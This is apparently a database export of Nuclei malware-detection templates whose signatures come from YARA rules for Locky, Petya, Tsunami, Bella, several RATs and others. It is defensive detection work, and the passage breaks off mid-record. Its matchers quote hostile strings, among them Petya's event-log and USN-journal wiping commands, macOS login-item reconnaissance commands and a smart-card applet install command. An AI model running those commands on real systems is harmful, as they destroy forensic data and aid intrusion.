"intel-virtualization-malware.yaml", "content": "id: intel-virtualization-malware\n\ninfo:\n name: Intel Virtualization Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: binary\n binary:\n - '4C6F6164535452494E47'\n - '496E697469616C697A654B6579486F6F6B'\n - '46696E645265736F7572636573'\n - '4C6F6164535452494E4746726F6D484B4355'\n - '6863637574696C732E444C4C'\n condition: and\n\n - type: binary\n binary:\n - '483A5C466173745C506C756728686B636D64295C'\n - '646C6C5C52656C656173655C48696A61636B446C6C2E706462'\n condition: and\n\n# digest: 490a00463044022013d609856dcbea597a8972ccf79c7efbaf74a453066aa09f49f30de2d3ca41af022047495390e0f0cff609552ada8a7e3c8310f2bfb9322a392bbdd64db5f2140688:922c64590222798bb761d5b6d8e72950\n", "hash": "6682b41faa405451da546ab87888954f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da7" }, "name": "iotreaper-malware.yaml", "content": "id: iotreaper-malware\n\ninfo:\n name: IotReaper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - 'XTALKER7'\n - 'Insta11 Microsoft'\n - 'wudMessage'\n - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'\n - 'B12AE898-D056-4378-A844-6D393FE37956'\n condition: or\n\n - type: binary\n binary:\n - 'E9000000006823040000'\n\n# digest: 4b0a00483046022100a92e0d01290662c6df6dc19b0f7d8dfb6cff192d7d779be40d4f4e538f28ef50022100ce06cbcf7a991b388572bcb400f680ae7af390620f3582d1586521b16fcc33ae:922c64590222798bb761d5b6d8e72950\n", "hash": "1feccac6561e66ac7a4d005869f18b68", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da8" }, "name": "linux-aesddos-malware.yaml", "content": "id: linux-aesddos-malware\n\ninfo:\n name: Linux AESDDOS Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"3AES\"\n - \"Hacker\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"3AES\"\n - \"VERSONEX\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"VERSONEX\"\n - \"Hacker\"\n condition: and\n\n# digest: 4a0a004730450221008d57442ef7f0c57e396e937805feb8e7629e470ef5ce511508a258d40756890802203363c538dea5383a8ffc67ade97c616ad2411d496a1291022fc606d4d51ae3ab:922c64590222798bb761d5b6d8e72950\n", "hash": "62a65b62adb6a00b0b087b016e182de9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da9" }, "name": "linux-billgates-malware.yaml", "content": "id: linux-billgates-malware\n\ninfo:\n name: Linux BillGates Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"12CUpdateGates\"\n - \"11CUpdateBill\"\n condition: and\n\n# digest: 4a0a00473045022100c5a56518759e09696fefe13a0b1d3e8c20486aa77b4054d125de1a64e6b85837022048802bd37744af7ab8b8d6ee87f166f72fb7540071fc1fa66d6758f8ec308ec1:922c64590222798bb761d5b6d8e72950\n", "hash": "666f5e762387e1754112ea517b7f9f20", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307daa" }, "name": "linux-elknot-malware.yaml", "content": "id: linux-elknot-malware\n\ninfo:\n name: Linux Elknot Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ZN8CUtility7DeCryptEPciPKci\"\n - \"ZN13CThreadAttack5StartEP11CCmdMessage\"\n condition: and\n\n# digest: 4b0a00483046022100afe801591518f61980e306df3239458666a21c5efadc7b0aa21c2a37a6f4389402210090d3fcaaafb407164a8e9a1b0374ef7defe960239f59ca36767f19d0e2d72a6d:922c64590222798bb761d5b6d8e72950\n", "hash": "844dc78b2d9fabf166acea63c1ae98fb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dab" }, "name": "linux-mrblack-malware.yaml", "content": "id: linux-mrblack-malware\n\ninfo:\n name: Linux MrBlack Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Mr.Black\"\n - \"VERS0NEX:%s|%d|%d|%s\"\n condition: and\n\n# digest: 4b0a00483046022100e7fcb47da01265dc6d82c988665412c3c254057857d7f60e165d3b62f7e446b5022100ee15cc6c71013da15b49ef559d53b3d02d14175a0dfdfb59a251661311801bdd:922c64590222798bb761d5b6d8e72950\n", "hash": "0a064b506ceb75808ebead1ae1b12916", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dac" }, "name": "linux-tsunami-malware.yaml", "content": "id: linux-tsunami-malware\n\ninfo:\n name: Linux Tsunami Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"PRIVMSG %s :[STD]Hitting %s\"\n - \"NOTICE %s :TSUNAMI \"\n - \"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\"\n\n# digest: 4a0a00473045022100b11e27e928e15e29276bad4b6c854bbac5c038ff4512449811a96c4008091e19022071292b63947f8670739933a7262c9ccfc954f74c637aad2c04f3a62857c325f9:922c64590222798bb761d5b6d8e72950\n", "hash": "9da0269b57fa55e60e80f1e349e5b122", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dad" }, "name": "locky-malware.yaml", "content": "id: locky-malware\n\ninfo:\n name: Locky Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"45b899f7f90faf45b88945b8\"\n - \"2b0a0faf4df8894df8c745\"\n condition: and\n\n - type: binary\n binary:\n - \"2E006C006F0063006B00790000\"\n - \"005F004C006F0063006B007900\"\n - \"5F007200650063006F00760065\"\n - \"0072005F0069006E0073007400\"\n - \"720075006300740069006F006E\"\n - \"0073002E0074007800740000\"\n - \"536F6674776172655C4C6F636B7900\"\n condition: and\n\n# digest: 4a0a0047304502207bf92252439de1c81b481ccc04452a42adaef5b2709cf230dfa77e1bbb0ee747022100918bbd08a177c897bd1a6e5174517e50bd150780bd831df32d7f5683d6ecbabe:922c64590222798bb761d5b6d8e72950\n", "hash": "2a430da20053672a5f7aabb308885e84", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dae" }, "name": "lostdoor-malware.yaml", "content": "id: lostdoor-malware\n\ninfo:\n name: LostDoor Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"*mlt* = %\"\n - \"*ip* = %\"\n - \"*victimo* = %\"\n - \"*name* = %\"\n - \"[START]\"\n - \"[DATA]\"\n - \"We Control Your Digital World\"\n - \"RC4Initialize\"\n - \"RC4Decrypt\"\n condition: and\n\n - type: binary\n binary:\n - \"0D0A2A454449545F5345525645522A0D0A\"\n\n# digest: 4a0a00473045022100f09b93e1cf30aeda8bdc4f1fe11328677f25778c788801f45f4a4a84546777bc02202dd9af3a65aa9435d840b2c25b19d4e32d7455f1549bff53adf7538a5532fed2:922c64590222798bb761d5b6d8e72950\n", "hash": "b53f65bd1b935f800827b0497f3c4e86", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307daf" }, "name": "luminositylink-malware.yaml", "content": "id: luminositylink-malware\n\ninfo:\n name: LuminosityLink Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"SMARTLOGS\"\n - \"RUNPE\"\n - \"b.Resources\"\n - \"CLIENTINFO*\"\n - \"Invalid Webcam Driver Download URL, or Failed to Download File!\"\n - \"Proactive Anti-Malware has been manually activated!\"\n - \"REMOVEGUARD\"\n - \"C0n1f8\"\n - \"Luminosity\"\n - \"LuminosityCryptoMiner\"\n - \"MANAGER*CLIENTDETAILS*\"\n condition: and\n\n# digest: 490a004630440220014ac277fc402a628e9185fe0e76a351be65603be58b48a2c02cbdface53903e0220363eca2d5743b2c8e61fbb485e325d04ffe864d9fae151cbb0217c2d7947d111:922c64590222798bb761d5b6d8e72950\n", "hash": "79e29bceedbce19caba9dda074af1683", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db0" }, "name": "luxnet-malware.yaml", "content": "id: luxnet-malware\n\ninfo:\n name: LuxNet Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"GetHashCode\"\n - \"Activator\"\n - \"WebClient\"\n - \"op_Equality\"\n - \"dickcursor.cur\"\n - \"{0}|{1}|{2}\"\n condition: and\n\n# digest: 4a0a0047304502210091a15227939391bbbb1ff990efe1986b5cee3a1d222ef86e8d87c70d05cfa30e0220328b29c901b6de0f8c662a0c0ae3aa1948899b7ec24346c6679f1c9838b24e60:922c64590222798bb761d5b6d8e72950\n", "hash": "8bf6b30d28ea7ce6ea190a224a26525f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db1" }, "name": "macgyver-installer-malware.yaml", "content": "id: macgyver-installer-malware\n\ninfo:\n name: MacGyver.cap Installer Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"delete -AID 315041592e5359532e4444463031\"\n - \"install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4\"\n - \"-mac_key 404142434445464748494a4b4c4d4e4f\"\n - \"-enc_key 404142434445464748494a4b4c4d4e4f\"\n condition: and\n\n# digest: 490a0046304402203ec0c760923b78ea7ff2bbbbbbb5d20673c1d5c924bc45ad0586320831f2609e02207df6edc08b4f88db4f1b710d1037086d5ef37a0cf0e0c4348ce69cfb4d6e5fb9:922c64590222798bb761d5b6d8e72950\n", "hash": "b25b01523c2866db347d464b495a8c5e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db2" }, "name": "macgyver-malware.yaml", "content": "id: macgyver-malware\n\ninfo:\n name: MacGyver.cap Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"src/MacGyver/javacard/Header.cap\"\n - \"src/MacGyver/javacard/Directory.cap\"\n - \"src/MacGyver/javacard/Applet.cap\"\n - \"src/MacGyver/javacard/Import.cap\"\n - \"src/MacGyver/javacard/ConstantPool.cap\"\n - \"src/MacGyver/javacard/Class.cap\"\n - \"src/MacGyver/javacard/Method.cap\"\n condition: and\n\n# digest: 490a00463044022047afeb1e4cf0d671f015f766751963babcaa994464a7cd807161f6cc53f9f85702205ea23d159f7c5f930e8ac99992c1e81b82bc58fa7bf50481168e325861e4667d:922c64590222798bb761d5b6d8e72950\n", "hash": "a5c8b4bc23918f0e4609e66f817e8022", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db3" }, "name": "macos-bella-malware.yaml", "content": "id: macos-bella-malware\n\ninfo:\n name: Bella Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara\n tags: malware,file,macos-bella\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"Verified! [2FV Enabled] Account ->\"\n - \"There is no root shell to perform this command. See [rooter] manual entry.\"\n - \"Attempt to escalate Bella to root through a variety of attack vectors.\"\n - \"BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER.\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"user_pass_phish\"\n - \"bella_info\"\n - \"get_root\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"Please specify a bella server.\"\n - \"What port should Bella connect on [Default is 4545]:\"\n condition: and\n\n# digest: 490a00463044022020ad29e486e7bd8f7024226d48a543032ac746afc8e929c68a189b2c3d312b9a02207489384ec2fcb05068a934ad391a9fcbdae8d9b1774000a5d2a643b12a2cd62a:922c64590222798bb761d5b6d8e72950\n", "hash": "3fa425f55144c729bd1d0f328271b175", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db4" }, "name": "madness-malware.yaml", "content": "id: madness-malware\n\ninfo:\n name: Madness DDOS Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/arbor/yara/blob/master/madness.yara\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Madness.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE\"\n - \"TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==\"\n - \"document.cookie=\"\n - \"[\\\"cookie\\\",\\\"\"\n - \"\\\"realauth=\"\n - \"\\\"location\\\"];\"\n - \"d3Rm\"\n - \"ZXhl\"\n condition: and\n\n# digest: 4a0a00473045022051f792d8fdfa305d5ab2037587778ab229d5024acc9068cb70f9980f11828e97022100c9fce5325c0373eff3477acb6ccdd1ef1e360f5382eb2bbb281a28a498d49aa3:922c64590222798bb761d5b6d8e72950\n", "hash": "4b0ab8d5af60971d971f594b25428b9b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db5" }, "name": "miner--malware.yaml", "content": "id: miner-malware\n\ninfo:\n name: Miner Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"stratum+tcp\"\n - \"stratum+udp\"\n\n# digest: 4a0a004730450220758248e479cc75a3a72cefbf3bd119a3c5a563b6e07281190431672114422cdc022100a164b67ed1b7ac223929521b51140f31f6d0ccb57dfd9f9618fb4fffbcbeeabc:922c64590222798bb761d5b6d8e72950\n", "hash": "8b5fa076e1caa712bb4c17f97c6b472c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db6" }, "name": "miniasp3-malware.yaml", "content": "id: miniasp3-malware\n\ninfo:\n name: MiniASP3 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"open internet failed…\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"run error!\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"run ok!\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"time out,change to mode 0\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"command is null!\"\n condition: and\n\n# digest: 4a0a00473045022100ec2ad4687e5402163e990ddb3e723d4fb30ad0a17b153eee6b4e6b4c7ce8d491022033512c2d600df63f943c3fa8cca3baee7078317444395edf1b8413d3de12f1bc:922c64590222798bb761d5b6d8e72950\n", "hash": "4494383641513daac940920a1b26a823", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db7" }, "name": "naikon-malware.yaml", "content": "id: naikon-malware\n\ninfo:\n name: Naikon Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"0FAFC1C1E01F\"\n - \"355A010000\"\n - \"81C27F140600\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"NOKIAN95/WEB\"\n - \"/tag=info&id=15\"\n - \"skg(3)=&3.2d_u1\"\n - \"\\\\Temp\\\\iExplorer.exe\"\n - \"\\\\Temp\\\\\\\"TSG\\\"\"\n condition: or\n\n# digest: 4a0a0047304502207f942d475af9fbeddcd2f52d61e40cf86505078196c46b7e2764e8261194f31302210092b2c2f39c63e4c41913d29dd5c5f9f9378002c2a629ecabb3193e2c30d6e5f5:922c64590222798bb761d5b6d8e72950\n", "hash": "7ca34b5d5dd5c6e99fc02b03cf4744f9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db8" }, "name": "naspyupdate-malware.yaml", "content": "id: naspyupdate-malware\n\ninfo:\n name: nAspyUpdate Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"8A5424148A0132C202C28801414E75F4\"\n\n - type: word\n part: raw\n words:\n - \"\\\\httpclient.txt\"\n - \"password <=14\"\n - \"/%ldn.txt\"\n - \"Kill You\\0\"\n condition: or\n\n# digest: 4b0a00483046022100a2a187bf7ef145fa334d95e0fddb1ccc02e4ae08f3f2f3737b415e180c6676a00221009244a5e76521882af8be71097a9b2bb6e6280decac6bb4b8b7e338a5da3eaa1c:922c64590222798bb761d5b6d8e72950\n", "hash": "56924930bc4b61e3380a0bc58e967774", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db9" }, "name": "notepad-malware.yaml", "content": "id: notepad-malware\n\ninfo:\n name: Notepad v1.1 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"75BAA77C842BE168B0F66C42C7885997\"\n - \"B523F63566F407F3834BCC54AAA32524\"\n\n# digest: 490a004630440220585a7e0714a199acc0a4b82b123259924032a0ecd218e03ca29509d6f5b7df200220313be0feccb7edd003a682a4e55e4ff1eb1ed40e6909ce5337a4c3cb5bda0854:922c64590222798bb761d5b6d8e72950\n", "hash": "e2d3e177a81f1b84354e592e5fbebf9f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dba" }, "name": "olyx-malware.yaml", "content": "id: olyx-malware\n\ninfo:\n name: Olyx Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/Applications/Automator.app/Contents/MacOS/DockLight\"\n condition: or\n\n - type: binary\n binary:\n - \"C7400436363636C7400836363636\"\n - \"C740045C5C5C5CC740085C5C5C5C\"\n condition: or\n\n# digest: 4b0a004830460221009c75627de0e45f09b5bf2a0358d73f141011199867953d3dc66b1f43e4e6c6cf022100f3fc56b70ff4a4b743b167d94cbf8037f3eb3a5b9f76cd60dbc57a1f66bef5fb:922c64590222798bb761d5b6d8e72950\n", "hash": "e97d06f9c37540465ffaaaf4b8293f8b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbb" }, "name": "osx-leverage-malware.yaml", "content": "id: osx-leverage-malware\n\ninfo:\n name: OSX Leverage Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ioreg -l | grep \\\"IOPlatformSerialNumber\\\" | awk -F\"\n - \"+:Users:Shared:UserEvent.app:Contents:MacOS:\"\n - \"rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the hidden of every login item'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the name of every login item'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the path of every login item'\"\n - \"serverVisible \\0\"\n condition: and\n\n# digest: 490a004630440220190e234b6d0f00657ae8e6f2d79b342fccf9e1dcb9c49de77781fa21e662da7302203dbf070c64970b142d6edbcb95b55be91252dff5ef95487e3a5ce7d106aafe5a:922c64590222798bb761d5b6d8e72950\n", "hash": "531373f554f79ed5c0ce56554183c8bf", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbc" }, "name": "paradox-malware.yaml", "content": "id: paradox-malware\n\ninfo:\n name: Paradox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ParadoxRAT\"\n - \"Form1\"\n - \"StartRMCam\"\n - \"Flooders\"\n - \"SlowLaris\"\n - \"SHITEMID\"\n - \"set_Remote_Chat\"\n condition: and\n\n# digest: 4a0a0047304502205cb43a84b5be60ac33d4401450525529ca661c5911dbe186e9b97b08cf437ca0022100b5b08da2e682f6a32b9e60236a33beadc9690a8959d876386778e5240754ad47:922c64590222798bb761d5b6d8e72950\n", "hash": "b80f5afba228846456fe6ef59dc9455b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbd" }, "name": "petya-malware-variant-1.yaml", "content": "id: petya-malware-variant-1\n\ninfo:\n name: Petya Malware (Variant 1) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Ooops, your important files are encrypted.\"\n - \"Send your Bitcoin wallet ID and personal installation key to e-mail\"\n - \"wowsmith123456@posteo.net. Your personal installation key:\"\n - \"Send $300 worth of Bitcoin to following address:\"\n - \"have been encrypted. Perhaps you are busy looking for a way to recover your\"\n - \"need to do is submit the payment and purchase the decryption key.\"\n condition: or\n\n# digest: 4b0a0048304602210084c742f95c8f61e60f9d2a9beb267e5daaec072b3fd36ccc733a70e01f2d1c9b02210086b0e7826a6055cca4010e7d175a1d1796e92e78392461f81c8ad5ce12d4d40e:922c64590222798bb761d5b6d8e72950\n", "hash": "2ab045f59b9daa631ae3a076421bb749", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbe" }, "name": "petya-malware-variant-3.yaml", "content": "id: petya-malware-variant-3\n\ninfo:\n name: Petya Malware (Variant 3) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"wevtutil cl Setup & wevtutil cl System\"\n - \"fsutil usn deletejournal /D %c:\"\n condition: or\n\n# digest: 490a0046304402200a5ce8456fd9e33848656de116ea8e935df34a4ec5bf5e18fc01dede3b0d5fd0022049187c34d01316789d0b3dca3ca9166a4543374e0243b654cee0dda079071867:922c64590222798bb761d5b6d8e72950\n", "hash": "47d8bc1675ad571bd67efdb2cad894f2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbf" }, "name": "petya-malware-variant-bitcoin.yaml", "content": "id: petya-malware-variant-bitcoin\n\ninfo:\n name: Petya Malware (Variant Bitcoin) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB\"\n\n# digest: 4b0a00483046022100ca5946dce3e94679c1ef8d9d8b05b3e1e06086777d2e5a379d7742016c24bbf8022100f33cec782c1929a868debd0fa962536a8606e1ff273092979a250752d22956e7:922c64590222798bb761d5b6d8e72950\n", "hash": "f38648dbbff6eb24ca5f4b720bb5fb23", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc0" }, "name": "plasma-malware.yaml", "content": "id: plasma-malware\n\ninfo:\n name: Plasma Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Miner: Failed to Inject.\"\n - \"Started GPU Mining on:\"\n - \"BK: Hard Bot Killer Ran Successfully!\"\n - \"Uploaded Keylogs Successfully!\"\n - \"No Slowloris Attack is Running!\"\n - \"An ARME Attack is Already Running on\"\n - \"Proactive Bot Killer Enabled!\"\n - \"PlasmaRAT\"\n - \"AntiEverything\"\n condition: and\n\n# digest: 4a0a004730450221008eb65f1513c0e2aef9d97696947b1a4ff2b56632eb8996690e2974b945c6683e02201633a82d34627d923130fb638757d0c5c9b78f2228ce4c8ef9d44982f38db553:922c64590222798bb761d5b6d8e72950\n", "hash": "3431040854feda3dcf37a83330d76a4b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc1" }, "name": "poetrat-malware.yaml", "content": "id: poetrat-malware\n\ninfo:\n name: PoetRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"launcher.py\"\n - \"smile.zip\"\n - \"smile_funs.py\"\n - 